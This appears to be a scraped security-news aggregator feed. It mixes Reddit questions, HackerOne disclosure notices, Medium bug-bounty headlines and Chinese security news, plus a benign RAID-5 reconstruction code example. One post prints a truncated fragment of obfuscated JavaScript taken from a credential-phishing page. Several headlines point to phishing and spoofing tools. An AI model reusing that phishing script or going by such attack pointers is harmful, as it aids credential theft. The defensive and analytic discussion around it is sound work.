    How does DUO fob work?
    I went to my university's IT desk today and told them I'm not using a smartphone anymore. They gave me a fob with a screen that generates passcodes by pressing a button. As far as I know, it has no internet connection, so it must be using some seed to generate "random" numbers, and the server must also know about this seed to match the generated passcodes. Two things I would like to understand. How does the fob sync with the server? I sometimes generate passcodes that I don't use. When I asked the IT guy about this, he told me it can get desynced on rare occasions. I would like to know why it doesn't always happen. Is there a way I can pull this seed from the fob and store it on my computer? If yes, would that be helpful for any would-be attackers? Edit: I read the following on the Duo website. What does it suggest? If your Duo token is falling out of sync, it may be due to one of the following reasons: The button is pressed many times (approximately 20 times) without successfully authenticating with Duo. For example, if a token is stored in a bag, it may cause the button to accidentally be pressed many times. The battery is dying because the token is old or has been used very frequently. Generally, the Duo token battery should last for a minimum of two years. submitted by /u/SteveSonOfJobs [link] [comments]
    You're on holiday, got robbed, SHTF situation etc.
    Imagine the following: you are on holiday and got robbed, you lost your phone and have just some money left and your passport in the hotel. So not too bad. But you want to get back on track, get online, contact your friends etc. Have you prepared for a situation like this? Have you ever experienced one? What did you do? Do you remember your Google passwords? 2FA codes, how do you get them? What are your strategies? Do you buy a cheap phone and connect your Google/iPhone account? Now 2FA is in the way... hm. Thanks for sharing your tips and expertise. submitted by /u/chris-78 [link] [comments]
    Certificate Based Authentication (CBA) Error
    I'm working on setting up CBA for a SharePoint Online instance. I've followed Microsoft's documentation (links below) to setup and configure Azure AD. User attribute altSecurityIdentities contains the X509: and X509: values AD Connect is configured to synchronize the on-prem attributes into Azure AD Verified that the certificateUserIds attribute in the Azure AD user object contains the same information from the altSecurityIdentities attribute on-prem Set the Authentication Strength to "Certificate Based Authentication (Multi-Factor) (have also tested with Single-Factor) under Conditional Access Created an Authentication Context under Conditional Access Created a Conditional Access Policy with the following settings Users = specific user (my non admin account) …
    What non-expensive SIEM can you suggest?
    Right now we are using AlienVault, but AlienVault is end of sale and we can't continue with this. It was a super cheap SIEM that covered our needs, but it wasn't customizable. As a person who worked with Splunk for many years before, the functionality was unsatisfactory to me, but my organization can't afford lavish solutions. My eyes fell on Security Onion with a paid support subscription. My own preference was ELK, but for ~30GB/day it costs almost 100k USD per year and it's out of budget. What other cost-effective SIEM could you suggest? submitted by /u/athanielx [link] [comments]
    When it's necessary to implement a SIEM in a company?
    I'm trying to understand the importance of a SIEM and how it would be a good option for a type of business or industry. For example, I've read you can't start a SOC without a SIEM, because at least you need to monitor and centralise everything you have to provide the cybersecurity service to any client. Now, if you're in a mid-size or big company and you have sensitive data like medical or military data, would it be a good option to implement a SIEM? Why or why not? submitted by /u/MrNoodlesLearns [link] [comments]
  • Open

    GitHub Security Lab (GHSL) Vulnerability Report: Insufficient path validation in ReceiveExternalFilesActivity.java (GHSL-2022-060)
    ownCloud disclosed a bug submitted by atorralba: https://hackerone.com/reports/1650270 - Bounty: $50
  • Open

    SecWiki News 2023-01-16 Review
    How JPCERT/CC automates malware analysis in the cloud by Avenger; A summary of file upload vulnerabilities by SecIN Community; SecWiki Weekly (Issue 463) by ourren. For more of the latest articles, visit SecWiki
  • Open

    CVE-2023-0179: Linux kernel stack buffer overflow in nftables: PoC and writeup
    Article URL: https://seclists.org/oss-sec/2023/q1/20 Comments URL: https://news.ycombinator.com/item?id=34400478 Points: 3 # Comments: 1
  • Open

    Linux hacks, including newest CVE
    There are many ways to hack linux. This collection of kernel exploits is a great start. Continue reading on Medium »
    Automations in Continuous Vulnerability Management
    What is Continuous Vulnerability Management? Continue reading on Insider Engineering »
  • Open

    FreeBuf's Top 10 authors of 2022 announced
    Thank you all for your recognition and support of FreeBuf in 2022; please keep supporting us next year as we build a first-class cybersecurity portal together.
    FreeBuf Morning Report | DiDi resumes new-user registration; personal information of several Taiwanese celebrities suspected leaked
    Taiwan's China Airlines appears to have been hacked, with a large volume of passenger data leaked to the internet, including that of dozens of public figures such as Lai Ching-te, Morris Chang and Lin Chi-ling.
    After more than 500 days, DiDi Chuxing is back
    On January 16, 2023, DiDi Chuxing resumed new-user registration, but its apps are still not listed in the major app stores.
    CIS 2022 Cybersecurity Innovation Conference open-course review | Shanghai main venue
    Highlights from the Shanghai main venue of the CIS 2022 Cybersecurity Innovation Conference are now available on FreeBuf open courses.
    CIS 2022 Cybersecurity Innovation Conference open-course review | Online session
    14 speakers discussed new trends, new technologies and new countermeasures in the cybersecurity industry across their respective topics.
    Another setback for TikTok: fined 5 million euros in France for making it hard to refuse cookies
    France's CNIL said TikTok did not offer a direct option to refuse cookies and failed to adequately inform users of the purposes of the different cookies.
    Guidance from the Ministry of Industry and Information Technology and fifteen other departments on promoting the development of the data security industry
    The Guidance states that by 2025 the data security industry should exceed 150 billion yuan, with a compound annual growth rate above 30%.
    How to do open-source code governance well | FreeBuf enterprise security Talk livestream recap
    According to research and consulting firm Gartner, 80-90% of software engineers use open-source components when building applications.
    SocialFish: a powerful phishing testing and information gathering tool
    SocialFish is a powerful phishing testing and information gathering tool that helps researchers run phishing tests or carry out information gathering.
    nmap_vulners: a powerful NSE script that provides vulnerability data from known service information
    nmap_vulners is a powerful NSE script that uses information about known services to provide vulnerability data to researchers.
    Clearing the clouds: what kind of zero trust do we need?
    More than ten years after it was first proposed, zero trust has gradually gained industry acceptance and unprecedented growth. What is the reason behind this?
  • Open

    Books, Microsoft Software, and mirrors of other large Open Directories
    submitted by /u/themariocrafter [link] [comments]
  • Open

    Wi-Fi Geolocation, Then and Now
    I've always been fascinated by the information maintained in the Windows Registry. But in order to understand this, to really get a view into this, you have to know a little bit about my background. The first computer I remember actually using was a Timex-Sinclair 1000, just like the one in the image shown to the right. You connected it to the TV, programs were created via the keyboard and usually copied from "recipes" in the manual or in a magazine, and the "programs" could be saved to or loaded from a tape in a tape recorder. Yes, you read that right...a tape recorder. I was programming BASIC programs on this system, and then on a Mac IIe. After that, it was the Epson QX-10, and then for a very long time, in high school and then in college (I started college in August, 1985), the TRS-80.…
  • Open

    JavaScript Static Analysis Tools for Vulnerability Detection in Node.js Packages
    Article URL: https://arxiv.org/abs/2301.05097 Comments URL: https://news.ycombinator.com/item?id=34395758 Points: 2 # Comments: 1

  • Open

    Full Account Take Over by very simple trick.
    Hi, this is @xerox0x1. This is my first write-up, so pardon me if anything slipped. And have fun! Continue reading on Medium »
    I Found Information Exposed In GitHub,What Next?
    Hi everyone, my name is Muhanad Israiwi. I’m a bug bounty hunter and a software engineering student at Amman Arab University. Continue reading on Medium »
    Learning Web-Sec — Day 12 - Authentication Vulnerabilities
    Broken Brute-Force Protection, IP Block Continue reading on System Weakness »
    Another day, Another major flaw this time in the TransUnion that allows bypassing security
    Here we go. Again. Continue reading on InfoSec Write-ups »
    JWT authentication bypass via unverified signature — Portswigger Simple Solution Writeup | 2023
    Portswigger Lab Solution — JWT Authentication Bypass by Karthikeyan Nagaraj Continue reading on InfoSec Write-ups »
    Open Redirect
    Hello, today I am writing about the Open Redirect vulnerability. Continue reading on Medium »
    Control Web Panel RCE Vulnerability
    What is RCE ? Continue reading on Medium »
    Finding CVE-2022–3786 (openssl) with Mayhem
    What is the bug? Continue reading on Medium »
    Penetration Testing XML-RPC: Uncovering the Weaknesses
    An Introduction to XML-RPC: Understanding the Basics of Remote Procedure Call Continue reading on Medium »
    The Top 5 Bug Bounty Hunting Automation Tools
    TL;DR:- My favorite bug bounty hunting tools for website pen-testing automation. Great for cybersecurity beginners, or advanced red-team… Continue reading on The Gray Area »
    How a Ukrainian developer quaked the French government.
    A true story, that happened a few years ago to a colleague. Continue reading on Medium »
  • Open

    Looking for a tool that functions like fiwalk but for the APFS filesystem.
    As the title says, looking for a tool that take stats of the APFS filesystem similar to fiwalk. I have looked at afro, and sleuthkit 4.11. I'm wondering if there is a tool/lib that I'm missing. submitted by /u/ahhjesus [link] [comments]
    Mobile phone imaging
    Hello:) I’m currently studying computer forensics and I am doing my dissertation on mobile forensics. This involves me imaging mobile phone devices. I would like to ask if anyone has a methodology into figuring out how to image a mobile device? I definitely need to retain as much data as possible so I would ideally prefer not to root or jailbreak the phones involved. submitted by /u/War_Maiden_ [link] [comments]
    how can i learn digital forensics?
    I'm a fresh grad in Forensic Science. We had Digital Forensics, but for a quarter only, and it wasn't that in depth. We weren't taught how to program and the like; we only learned the basic terms used in Digital Forensics. I'd like to pursue a career in Digital Forensics; however, I don't have any programming or IT background, but I'm willing to learn and take online certificates. Do you think it's possible to self-teach everything in Digital Forensics? And if so, can you help me with where to start, what I must know, and what to prioritize? Thank you! submitted by /u/AdOdd5751 [link] [comments]
    Raid-5 reconstruction from images
    Hello everyone, I seek to combine 6 separate RAID-5 images (E01) into one complete one. I found a guide on Medium called How to Combine RAID Array images in EnCase, but my version of EnCase does not show the same options as in the guide, so I wonder how you would go about reassembling the images? What tools would you use? Any and all help is appreciated. submitted by /u/stormer14789 [link] [comments]
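    An added example, not from the post or from EnCase, of what the reassembly actually does once the E01 members are exported to raw, so the layout guess can be checked before trusting any tool's output. It assumes the Linux md default of a left-symmetric rotation with one parity chunk per stripe row; hardware controllers differ in rotation, chunk size and member order, and those are the parameters to vary until the reassembled volume carries a readable filesystem. Member order, chunk size and the rotation below are assumptions, and the volume used to exercise the code is constructed in memory.

```javascript
// Added example: de-striping a RAID-5 set of raw member images, with a parity check and
// single-member reconstruction. Layout: left-symmetric (Linux mdadm default), an assumption.
// Members are plain Buffers here; for E01 evidence, export each member to raw first.

// Member holding parity for stripe row r: rotates from the last member downwards.
function parityDisk(row, nDisks) { return (nDisks - 1) - (row % nDisks); }

// Left-symmetric: the first data chunk of a row sits just after the parity member and wraps.
function dataDisk(row, dataIdx, nDisks) { return (parityDisk(row, nDisks) + 1 + dataIdx) % nDisks; }

// XOR of every member at the same offset must be zero for a consistent RAID-5 set. This is
// independent of chunk size and rotation: it validates the member set, not the layout guess.
function parityMismatches(images) {
  let bad = 0;
  for (let off = 0; off < images[0].length; off++) {
    let x = 0;
    for (const img of images) x ^= img[off];
    if (x !== 0) bad++;
  }
  return bad;
}

// Rebuild one missing member (null in `images`) from the others by XOR.
function rebuildMissing(images) {
  const missing = images.map((b, i) => (b ? -1 : i)).filter(i => i >= 0);
  if (missing.length === 0) return images;
  if (missing.length > 1) throw new Error('RAID-5 can reconstruct at most one missing member');
  const len = images.find(b => b).length;
  const rebuilt = Buffer.alloc(len);
  for (let off = 0; off < len; off++) {
    let x = 0;
    for (const img of images) if (img) x ^= img[off];
    rebuilt[off] = x;
  }
  const out = images.slice();
  out[missing[0]] = rebuilt;
  return out;
}

// De-stripe: walk each row, copy the data chunks in logical order, skip the parity chunk.
function reassembleRaid5(imagesIn, chunkSize) {
  const images = rebuildMissing(imagesIn);
  const n = images.length;
  const rows = Math.floor(images[0].length / chunkSize);
  const out = Buffer.alloc(rows * (n - 1) * chunkSize);
  for (let r = 0; r < rows; r++) {
    for (let d = 0; d < n - 1; d++) {
      images[dataDisk(r, d, n)].copy(out, (r * (n - 1) + d) * chunkSize, r * chunkSize, (r + 1) * chunkSize);
    }
  }
  return out;
}

// Inverse operation, used to build a test set: stripe a volume onto n members with parity.
function buildRaid5(volume, nDisks, chunkSize) {
  const rows = Math.ceil(volume.length / ((nDisks - 1) * chunkSize));
  const images = Array.from({ length: nDisks }, () => Buffer.alloc(rows * chunkSize));
  for (let r = 0; r < rows; r++) {
    const parity = Buffer.alloc(chunkSize);
    for (let d = 0; d < nDisks - 1; d++) {
      const start = (r * (nDisks - 1) + d) * chunkSize;
      const chunk = volume.subarray(start, start + chunkSize); // last chunk may be short
      chunk.copy(images[dataDisk(r, d, nDisks)], r * chunkSize);
      for (let i = 0; i < chunk.length; i++) parity[i] ^= chunk[i];
    }
    parity.copy(images[parityDisk(r, nDisks)], r * chunkSize);
  }
  return images;
}
```

    Two practical points follow from the code: a zero parity-mismatch count only proves the six images belong together, not that the chunk size or rotation is right, because a wrong chunk size still de-stripes without error and simply produces garbage; and with all six members present the parity chunks are redundant, so a set that fails the parity check has a member from a different point in time or a bad acquisition, which is worth knowing before any filesystem parsing.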
  • Open

    what do you think about that ?🧑‍💻🧠
    submitted by /u/devnatech [link] [comments]
    DLL Hijacking outside DllMain, using Spartacus
    submitted by /u/h0wlett [link] [comments]
    Is it possible to hack iCloud info for missing person (last known location of phone)
    submitted by /u/beeksoner [link] [comments]
  • Open

    Top 3 OSINT tools
    Welcome to our latest blog post, where we will be discussing the top 3 OSINT (Open-Source Intelligence) tools that can help you… Continue reading on Medium »
    How to find out on what dates a web page was changed using archive.org
    Archive.org is a unique tool that allows you to look up the history of a site since its inception (but not before 1996) and find data that… Continue reading on Medium »
    What is OSINT?
    OSINT is the analysis of information that is openly available on the internet, from social media posts to TV and radio broadcasts; this analysis… Continue reading on Medium »
    The simplest guide to scraping with Google Sheets
    There are so many ways to collect data from web pages. Examples: Continue reading on Medium »
    Critical Vulnerability through OSINT only
    Hi everyone, today I want to show you a very quick way that I used to get a Critical Vulnerability by using basic OSINT only. Continue reading on Medium »
    SPY NEWS: 2023 — Week 2
    Summary of the espionage-related news stories for the Week 2 (January 8–14) of 2023. Continue reading on Medium »
  • Open

    Show HN: CVE Vulnerability Info Downloader – Including Dashboard for OpenVAS
    Article URL: https://github.com/trinitor/CVE-Vulnerability-Information-Downloader Comments URL: https://news.ycombinator.com/item?id=34392543 Points: 2 # Comments: 0
  • Open

    Google Chrome Security Vulnerability Detected Could Lead to Crypto Wallet Steal
    Article URL: https://news.coincu.com/160500-google-chrome-security-flaw/ Comments URL: https://news.ycombinator.com/item?id=34391767 Points: 2 # Comments: 0
  • Open

    Bind Shell & Reverse
    As far as I know, a bind shell originates when the attacker sets up a listener for incoming connections on the target machine at a $port and then connects to it by entering the $ip:$port of the target. A reverse shell switches things so the attacker machine will be the one listening. Cool. I feel confused about it. In the context of me doing exercises, spawning bind/reverse shells between Windows and Linux, I feel something more is lost that would help me really differentiate them when a task asks: Make a bind shell on Windows and connect to it via Linux. Does it mean Windows needs to be listening or Linux? I feel it could also mean that Linux should be listening. Moreover, what are the concerns between using bind over reverse? A bind is inconvenient because it sets the target to have a listening port that exposes them, correct? Are there more differences? submitted by /u/DerekFoReal777 [link] [comments]
    Github.com raises "Connection not secure" on my workplace's LAN. Fine on my phone and everywhere else. Why?
    My workplace has a super strict blacklist of websites. As a developer I cannot do my job without GitHub, so I bring my laptop and surf on my phone's data. The phone was getting slow, so I tried to use the work WiFi and github.com raises an "HTTP CERTIFICATE EXPIRED" error. What is this? Is this some trivial quirk, or some vulnerability I need to mention to my superiors? submitted by /u/BigBootyBear [link] [comments]
    XSRF will never happen if I only use POST requests to send sensitive requests?
    Since XSRF is such a well known thing, there is a massive amount of blog posts and resources written by people who barely know what XSRF is technically, so it's quite difficult for me to understand XSRF in detail. However, I have come to the conclusion, based on my current understanding, that XSRF will never happen if a website only uses POST requests to send sensitive stuff like deleting an account. By this I mean there will be no way a user clicks on a sketchy link and gets their account deleted if a website only implements its requests with POST. Here is the sample code of a Node.js web server; I have also attached sample GET and POST XMLHttpRequests that the attacker can use. Code with syntax highlighting in pastebin: https://pastebin.com/gaVdLCc3 const express = require('express'); const app …
    IPS Deployment Best Practices - This Post is Aimed for Beginner in Network Security
    This post will discuss IPS and the benefits it provides to organisations when configured and implemented correctly. The bad news is that many organisations are not utilising their IPS effectively. In many cases, they have just enabled the IPS on their edge firewalls, thinking that they are now protected against known attacks. What is an IPS? An intrusion prevention system (IPS) - sometimes referred to as an intrusion detection prevention system (IDPS) - is a network security technology and an integral part of any enterprise security system that continuously monitors network traffic for suspicious activity and takes steps to prevent it. By reducing manual work for security teams and allowing other security products to perform more efficiently, IPS solutions help filter out malicious act…
  • Open

    Any discord servers for exploit dev?
    submitted by /u/Peixetlift [link] [comments]
  • Open

    SecWiki News 2023-01-15 Review
    SecWiki Weekly (Issue 462) by ourren. For more of the latest articles, visit SecWiki
  • Open

    Indian startup -LensKart leaked the personal information of 7 million customers and several staff…
    No content preview
    How to spoof e-mails. (DMARC, SPF, and Phishing)
    No content preview
    How to Create Incident Response Plan?
    No content preview
    Domain Name System 0x1 | DNS 101
    No content preview
    How I Found AWS API Keys using “Trufflehog” and Validated them using “enumerate-iam” tool
    No content preview
    Free Cloud (Browser-based) Labs of DVWA and bWAPP
    No content preview
    QuillAudit CTF challenges — Writeups
    Solutions of all retired challenges can be found here. Continue reading on InfoSec Write-ups »
    OWASP TOP 10
    No content preview
    Identifying Coin Scammers with Wallet-Tracker
    No content preview
    What You Need to Know About The CISSP Exam?
    To prepare for the Certified Information Systems Security Professional (CISSP) exam, you should first familiarize yourself with the exam… Continue reading on InfoSec Write-ups »
  • Open

    Finding CVE-2022–3786 (openssl) with Mayhem
    What is the bug? Continue reading on Medium »
  • Open

    FreeBuf Morning Report | TikTok fined 5.4 million dollars in France; Cisco warns of business router vulnerability
    For violating cookie consent rules, France's data protection regulator fined the short-video platform TikTok 5 million euros (about 5.4 million dollars).
  • Open

    Western Horizon Technologies TI 99/4a and Geneve Archive
    http://www.whtech.com/ftp/ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    i know nothing
    I'm completely new to computer stuff in general, like I know how to google simple stuff and how to play PC games lol, but how do I get started in personal cybersecurity? I just downloaded John the Ripper to play with, only to realize how little I understand computers, so where do I start to help me understand what to do and how to learn cybersecurity? Like, coding would help, but idk if that's necessary or what I should start with, so where should I start to understand any of this? submitted by /u/brother_alpharius [link] [comments]

  • Open

    How to view the history of a social media profile name using the Archive.org CDX API. 4 steps guide
    When collecting information about a person, it is sometimes important to see how websites and social media pages associated with them have… Continue reading on Medium »
  • Open

    Security engineering book recommendations?
    Hi friends! I am looking for recommendations if you have any about good foundational and "advanced" (if there are any) books that are more focused on the development/architecture side of security engineering. The only books I've read on SecEng have been the "Guide to building dependable distributed systems" book by Ross Anderson and "How to measure anything in Cyber–Security Risk" by Hubbard. I'm sure there are plenty of other books out there, but I've been having the hardest time making decisions on which ones to read, as I could not really find lists of SecEng-related books that didn't seem to contain the same 2-3 books out of a list of "top 10". Was hoping to get pointed in the right direction. Thanks! submitted by /u/CaseCosmix [link] [comments]
    Is SSH to a compromised server a security risk?
    A client SSHs into a server that has been compromised. Is this SSH connection a security risk for the client? In the next scenario, the client backs up files from the server to its local machine over SSH in pull mode, using, e.g., “rsync server@ip:/files mybackup”. Is this rsync connection a security risk for the client? (Other than, of course, downloading the attacker’s files.) submitted by /u/chaplin2 [link] [comments]
    What are the possibilities, if any, that an organization or individual corrupted the files that shut down the U.S. airways?
    I'm just curious if this could have been a cyber security attack against our infrastructure. Please ELI5 since I am not an industry professional. submitted by /u/exstaticj [link] [comments]
    Is the AWS Solutions Architect and/or AWS Certified Security worth it?
    I'm working as a security engineer and work with AWS, not all the time, but frequently enough. I'd like to improve my skills in this regard. Are these certs worth it in the industry? submitted by /u/herbertisthefuture [link] [comments]
  • Open

    “Unleashing the Power of Python to Uncover the Root Cause of SQL Injection Attacks”
    SQL injection is a type of security vulnerability that occurs when an attacker is able to insert malicious SQL code into a web application… Continue reading on Medium »
    The Life of a Hacker: A Look Behind the Scenes
    When we think of hackers, we often imagine shadowy figures sitting in front of computer screens, breaking into systems and stealing… Continue reading on Medium »
    Hacking: The Dark Side of the Digital World
    Hacking, the art of exploiting vulnerabilities in computer systems, has become a hot topic in today’s digital world. From small-scale… Continue reading on Medium »
    SQL injection in Depth
    SQL injection is a type of security vulnerability that occurs when an attacker is able to insert malicious code into an SQL statement… Continue reading on Medium »
    Dexalot HackenProof Bug Bounty
    Dexalot is a non-custodial, decentralized cryptocurrency exchange with Central Limit Order Book capability. Avalanche… Continue reading on Dexalot »
    How Browser’s Save As Feature might lead to Code Execution (CVE-2022–45415)
    A few days ago, while I was exploring browser-based bugs, I read an article on the internet explaining a path traversal vulnerability in… Continue reading on InfoSec Write-ups »
    The World of SMTP SPF and DMARC and Potential bugs
    This week I was more interested in how emails are protected and in the SMTP protocol in general, so I was learning more on that. Email security… Continue reading on Medium »
    Bug Hunting 101: Directory Enumeration & Authentication Bypass
    TL;DR- A quick write-up on the best methods I’ve used for bug bounties that included directory issues and authentication vulnerabilities… Continue reading on The Gray Area »
    Easy XSSHunter Express Setup Script
    With xsshunter.com shutting down, setting up your own XSSHunter will be more important. This script will make it a lot easier. Continue reading on Medium »
  • Open

    Analysis of FG-IR-22-398 – FortiOS - heap-based buffer overflow in SSLVPNd
    submitted by /u/Gallus [link] [comments]
    Impact of the CircleCI Security Incident on the Datadog Agent
    submitted by /u/dlorenc [link] [comments]
    santa-linux: a proof of concept binary authorization system for linux, based on Google's Santa
    submitted by /u/ahigherporpoise [link] [comments]
  • Open

    Module archive
    https://ftp.modland.com/pub/modules/ submitted by /u/Waste-Release-6235 [link] [comments]
    [NSFW] Wordpress indexes of nudity.
    https://playblog.ws/play/wp-content/uploads/ https://commentseduire.net/wp-content/uploads/ https://femdom-joi.com/wp-content/uploads/ submitted by /u/ringofyre [link] [comments]
    Bunch of ebooks
    https://gutenberg.ca/ebooks/ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    Moving to bugbounty.
    So, due to some /financial/ problems I am moving to bug bounty, keeping in mind "I will do better for them". I will be back after one year. What do you awesome guys think, am I doing right or wrong? Need suggestions. Regards, iyamroshan. submitted by /u/Iyamroshan [link] [comments]
  • Open

    SecWiki News 2023-01-14 Review
    Best practice: how to formalize the IP profiling process by ourren Forrester: 2022 security analytics platform vendor evaluation by ourren Cyber-crime analysis track, team "N0nE429" writeup by ourren Network traffic analysis track, team "见世面" writeup by ourren Research on security issues of software packages in the open-source ecosystem by ourren Three ways to locate an individual's PC inside a domain by ourren "智胜空天·安全护航" observations on the state of UAVs and security analysis report by ourren Summary of 2022 fuzzing papers in CCF B-level and above journals by ourren Web3 security: on-chain threat analysis tutorial by ourren Application of AI technology in situational awareness by ourren Sentencing issues and countermeasures for web crawler crimes by ourren Modified CIA attack toolkit Hive enters the black/grey market by ourren Exploring innovation in offensive and defensive techniques by ourren World's first space cyber threat tactics and techniques framework released by ourren For more of the latest articles, visit SecWiki
  • Open

    Red Team Capability Maturity Model
    Hey folks, just wanted to alert people to a new resource that was released yesterday to help measure/report on/plan for team maturity in a standardized way. There's a blog post on the site that goes into a little more detail in addition to the CMM itself. https://www.redteammaturity.com submitted by /u/Tai-Daishar [link] [comments]
  • Open

    Uninstalling Mattermost Launcher for Windows (64-bit), then reinstalling keeps you logged in without authentication
    Mattermost disclosed a bug submitted by annonmous: https://hackerone.com/reports/1797661
  • Open

    BitRAT is spreading using sensitive bank data as bait
    Researchers found that attackers hijacked the infrastructure of a Colombian bank and used sensitive data from the bank as bait.
  • Open

    Article on Hacksudo Search box solving
    Topic Covered Continue reading on Medium »
    Bug Hunting 101: Directory Enumeration & Authentication Bypass
    TL;DR- A quick write-up on the best methods I’ve used for bug bounties that included directory issues and authentication vulnerabilities… Continue reading on The Gray Area »
  • Open

    Photobomb — HackTheBox Machine Simple Writeup | 2023
    No content preview
    OpenAI ChatGPT for Cyber Security
    No content preview
    Kerberos Authentication (again… but better)
    No content preview
    HTML injection in an email template
    No content preview
    Discovering vulnerabilities quickly with targeted scanning — Portswigger
    No content preview
    AWS EC2 Auto Scaling Privilege Escalation
    No content preview
    Shoppy — HackTheBox Machine Simple Writeup | 2023
    No content preview
  • Open

    Footprinting/Fingerprinting
    Footprinting and fingerprinting are related terms, but each has a slightly different focus. Continue reading on Medium »

  • Open

    Can anyone help deobfuscate this JS found in cred phishing attack ?
    It seems like this was loading during a credential phish attack I was looking at. It was originally base64-encoded and wrapped in eval(atob(“ “)); I’ve gotten it decoded but now I’m lost. The attack was thwarted, but I’m really curious what the code does. It was your standard fake MS portal phishing attack. var _0x22c0a8 = _0x1057; (function(_0x4ce139, _0x4f4b54) { var _0x15c7b0 = _0x1057, _0xbea43e = _0x4ce139(); while (!![]) { try { var _0x56e5e2 = -parseInt(_0x15c7b0(0x156)) / 0x1 + -parseInt(_0x15c7b0(0x15e)) / 0x2 * (parseInt(_0x15c7b0(0x172)) / 0x3) + parseInt(_0x15c7b0(0x15d)) / 0x4 + parseInt(_0x15c7b0(0x164)) / 0x5 + -parseInt(_0x15c7b0(0x16d)) / 0x6 * (parseInt(_0x15c7b0(0x16e)) / 0x7) + -parseInt(_0x15c7b0(0x154)) / 0x8 * (-parseInt(_0x15c7b0(0x173)) / 0x9) + parseInt(_0x15c7b0(0x168))…
    What happens to cyber functions after a breach?
    We see so many breaches these days, especially the more recent ones this year with the Royal Mail in the UK. What usually happens after a breach has occurred, as in when the investigation is ongoing? Always curious to know whether cyber functions are sacked from their job or whether they are grilled, because this side of the story is very rarely published in the press, well, in the UK anyway, with the likes of the BBC. Is it different outside the UK? submitted by /u/vayigos [link] [comments]
    Is helpdesk a trap?
    Sup guys, A piece of advice that seems to be thrown around a lot is that helpdesk positions are a good way to break into infosec sectors, for new grads. To what extent is this really true? What would be some other (hopefully better) ways to achieve similar results? submitted by /u/gekdgsbsl [link] [comments]
    SOC 2 supplemental criteria
    The company is getting a product area audited for SOC 2. I have the trust-services-criteria 2020.pdf but I don't understand where the supplemental criteria are specified. For example the PI Series criteria is mentioned on page 5, but is this defined in another doc that I cannot find? submitted by /u/ScreamOfVengeance [link] [comments]
    PowerShell signed scripts
    Hello, in my company we plan to use signed PowerShell scripts. Are there any drawbacks and/or security problems with this? Are they really safe when you deploy them on a fleet of computers, what happens when the certificate expires, etc.? Thanks in advance submitted by /u/hthouzard [link] [comments]
    Is forwarding a port on your router a risk when the destination is turned off?
    Hi, Is forwarding a port on your router a risk when the destination is turned off? For example, I have figured out a way to start a vm on my network on demand through a cron job. I am just wondering if the port forward itself poses any risk when the vm is off? Thanks, Chris submitted by /u/chrispercol [link] [comments]
    Best password manager? Actually best?
    I have been using LastPass for a long time; a while ago they changed the price and the free tier sucks now. I use it mainly because of 2FA sync (side note: the sync also sucks). I use my phone heavily, and almost every phone I owned I changed on the warranty. Anyway, I wanted to hear from Reddit about a nice free alternative or even a cheap one. Maybe self-hosted ones as well, since I run my own servers so I can throw a docker in there for passwords. Any suggestions? UPDATE: wow, the majority suggested Bitwarden. I went with the unofficial community version for the 2FA. I wish the official one offered 2FA for free. submitted by /u/squadfi [link] [comments]
  • Open

    Robots.txt file with potentially sensitive content.
    Yelp disclosed a bug submitted by ethack1886: https://hackerone.com/reports/1724771
    Critical sensitive information Disclosure. [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by berserkbd47: https://hackerone.com/reports/1626236 - Bounty: $500
    Wordpress Takeover using setup configuration at http://.edu [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by berserkbd47: https://hackerone.com/reports/1626205 - Bounty: $1000
    Github app Privilege Escalation to Administrator/Owner of the Organization
    GitHub disclosed a bug submitted by vaib25vicky: https://hackerone.com/reports/1732595 - Bounty: $10000
    Reference caching can leak data to unauthorized users
    Nextcloud disclosed a bug submitted by systemkeeper: https://hackerone.com/reports/1767503
  • Open

    CircleCI incident report for January 4, 2023 security incident
    submitted by /u/baty0man_ [link] [comments]
    A Public Git repository & misconfiguration detection tool
    submitted by /u/nicksthehacker_ [link] [comments]
    🚀 Announcing Matano + Suricata: Build your own Security Data Lake on AWS using Suricata Logs
    submitted by /u/shaeqahmed [link] [comments]
    Announcing a stable release of sigstore-python
    submitted by /u/yossarian_flew_away [link] [comments]
    Crassus: Windows privilege escalation discovery tool
    submitted by /u/Fugitif [link] [comments]
    How to use Open Source CloudQuery for Attack Surface Management and Graph Visualization for Cloud and AWS | CloudQuery
    submitted by /u/jsonpile [link] [comments]
    Bad things come in large packages: .pkg signature verification bypass on macOS
    submitted by /u/xnyhps [link] [comments]
  • Open

    10 very simple tips for OSINT tool developers
    There are 4,329 repositories on Github using the keyword OSINT. Continue reading on Medium »
    The 10 Commandments of Open Source Intelligence
    No doubt about it, OSINT’s moment has arrived. Propelled by an ever-increasing volume of public information and rapid geo-political… Continue reading on The First Digit »
    The 10 Commandments of Open Source Intelligence
    No doubt about it, OSINT’s moment has arrived. Propelled by an ever-increasing volume of public information and rapid geo-political… Continue reading on Medium »
  • Open

    Nucleon Public Incentivized Testnet & Bug Activity || Zero Investment Airdrop || Join Now.
    NUCLEON Announcing Incentivized Testnet Activity Continue reading on Medium »
    Learning Web-Sec - Day 11 - Authentication Vulnerabilities
    Username enumeration via response timing - PortSwigger Lab Walkthrough. Continue reading on System Weakness »
    Dexalot Bug Bounty from HackenProof
    Dexalot is a non-custodial, decentralized cryptocurrency exchange with Central Limit Order Book capability. Powered by… Continue reading on Dexalot »
    Dexalot Bug Bounty on HackenProof
    Dexalot is a decentralized cryptocurrency exchange with a non-custodial Central Limit Order Book feature, powered by Avalanche… Continue reading on Dexalot »
    Bug Zero at a Glance [Week 07 - 13 January]
    What Happened with Bug Zero? Continue reading on Bug Zero »
    Dexalot HackenProof Bug Bounty
    Dexalot is a non-custodial, decentralized cryptocurrency exchange with a Central Limit Order Book capability. Continue reading on Dexalot »
    All about: Business Logic Bugs
    In the Name of Allah, the Most Gracious, the Most Merciful Continue reading on Medium »
    BOUNTY HACKER ON TRYHACKME
    The second challenging room in the beginner's path: Bounty Hacker on TryHackMe Continue reading on Medium »
    Bug Bounty Guide and Tools
    What is Bug Bounty Program? Continue reading on Medium »
    ✅ Best commands for Port Scanning — For OSCP, pentests, bug bounties
    In a penetration testing engagement, scanning is a very important phase in which we get to know better the potential vulnerabilities of… Continue reading on Medium »
  • Open

    Any hints how to injest in bloodhound an offline (extracted) ntds.dit file ?
    submitted by /u/StyGre [link] [comments]
    Measuring Sliver vs Havoc
    submitted by /u/Diesl [link] [comments]
  • Open

    Our team’s vulnerabilities disclosures 2022
    Our cybersecurity researchers devote time to reporting vulnerabilities in open-source projects we use every day, but our interests are… Continue reading on Faraday »
    FuzzingWeekly CW 2 — free hacking tools that are good for appsec
